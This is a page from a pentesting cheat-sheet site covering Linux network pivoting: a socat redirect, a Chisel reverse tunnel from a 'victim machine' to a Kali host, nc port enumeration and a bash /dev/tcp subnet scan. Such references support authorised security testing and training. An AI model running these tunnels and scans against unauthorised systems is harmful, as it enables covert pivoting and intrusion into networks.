pwny.cc
  • Home
  • SO
    • AI
      • Evasion
        • Exercise 1
        • Exercise 2
        • Exercise 3
        • Exercise 4
    • Android
      • adb
      • apktool
      • burp suite
      • dns spoofing
      • frida
      • intent
      • jadx
      • JNI
      • objection
      • tcpdump
      • webview
    • iOS
      • objection
    • Linux
      • Internal Recon
      • Bypasses
      • Network
      • Exfiltration
      • Containers
      • Iptables
    • Windows
      • Internal Recon
      • External Recon
      • Bypasses
      • Network
      • Exfiltration
  • SHELLS
    • Misc
    • Web Shells
    • Reverse Shells
    • Obfuscated Shells
  • WEB ATTACKS
    • Misc
    • Command Injection
    • Cross-Site Scripting (XSS)
      • XSS Tips
      • WAF Bypasses
    • Insecure Direct Object Reference (IDOR)
    • Insecure File Upload
    • Local File Inclusion (LFI)
      • Bypass Techniques
      • LFI to RCE
    • OAuth
    • Open Redirect
      • Open Redirect to XSS
    • Server Side Request Forgery (SSRF)
    • Server Side Template Injection (SSTI)
    • SQL Injection (SQLi)
      • SQLMap
      • MySQL
      • MSSQL
      • Oracle
      • PostgreSQL
    • XML External Entity (XXE)
  • OTHER
    • Cracking
      • Hashcat
      • John the Ripper
    • Sandbox Escape
Powered by GitBook
On this page
  • Socat TCP redirection
  • Chisel TCP tunnel over HTTP
  • Enum ports using nc
  • Scan IP/Ports from Bash

Was this helpful?

  1. SO
  2. Linux

Network

PreviousBypassesNextExfiltration

Last updated 3 years ago

Was this helpful?

Socat TCP redirection

#Example HTTP redirection: socat TCP4-LISTEN:80,fork TCP4:10.10.10.19:80
socat TCP4-LISTEN:<PORT>,fork TCP4:<REMOTE-HOST-IP-ADDRESS>:<REMOTE-HOST-PORT>

Chisel TCP tunnel over HTTP

#Download chisel for victim machine version
#10.10.10.19 == kali_IP. 4506 == Port to redirect.
./chisel client 10.10.10.19:10000 R:4506:127.0.0.1:4506 #In Victim Machine
./chisel server -p 10000 --reverse #In Kali Machine

Enum ports using nc

#nc -zv IP PORT-RANGE
nc -zv 127.0.0.1 20-80

Scan IP/Ports from Bash

for ip in {1..254};
do for port in {22,80,443};
	do (echo >/dev/tcp/10.10.10.$ip/$port) >& /dev/null \
	&& echo "10.10.10.$ip:$port is open";
	done;
done;
Releases · jpillora/chiselGitHub
Chisel - Releases
Logo